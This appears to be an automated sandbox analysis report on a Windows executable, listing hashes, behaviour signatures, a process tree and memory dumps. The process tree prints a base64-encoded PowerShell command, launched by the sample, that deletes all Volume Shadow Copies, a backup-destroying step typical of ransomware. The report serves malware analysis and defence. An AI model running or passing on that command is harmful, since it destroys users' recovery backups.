Analysis

  • max time kernel
    147s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    20-10-2020 11:48

General

  • Target

    2e83e8c0dfc380cf60a217b10b6e208e71e35e16ceea6a6f9005904519383426.exe

  • Size

    116KB

  • MD5

    2174bbe764a989e7e0b0e1b01aae240a

  • SHA1

    4e8b23ba93fd8ca5bc108470207dafe03881c031

  • SHA256

    2e83e8c0dfc380cf60a217b10b6e208e71e35e16ceea6a6f9005904519383426

  • SHA512

    2978f34e7d5474257f3fcea74a04ac8c874aa1e84ee8b570ae5da262c5972cc63c18ae7c2a3f639a173116f1ea3a8fe6c46ce8c9f3fbad62ad4752be8e90132b

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies service 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e83e8c0dfc380cf60a217b10b6e208e71e35e16ceea6a6f9005904519383426.exe
    "C:\Users\Admin\AppData\Local\Temp\2e83e8c0dfc380cf60a217b10b6e208e71e35e16ceea6a6f9005904519383426.exe"
    1⤵
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2028
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:660
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:964

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2028-0-0x0000000000000000-mapping.dmp
    • memory/2028-1-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp
      Filesize

      9.9MB

    • memory/2028-2-0x0000000002260000-0x0000000002261000-memory.dmp
      Filesize

      4KB

    • memory/2028-3-0x000000001AD00000-0x000000001AD01000-memory.dmp
      Filesize

      4KB

    • memory/2028-4-0x00000000025D0000-0x00000000025D1000-memory.dmp
      Filesize

      4KB

    • memory/2028-5-0x0000000002490000-0x0000000002491000-memory.dmp
      Filesize

      4KB

    • memory/2028-6-0x000000001B5B0000-0x000000001B5B1000-memory.dmp
      Filesize

      4KB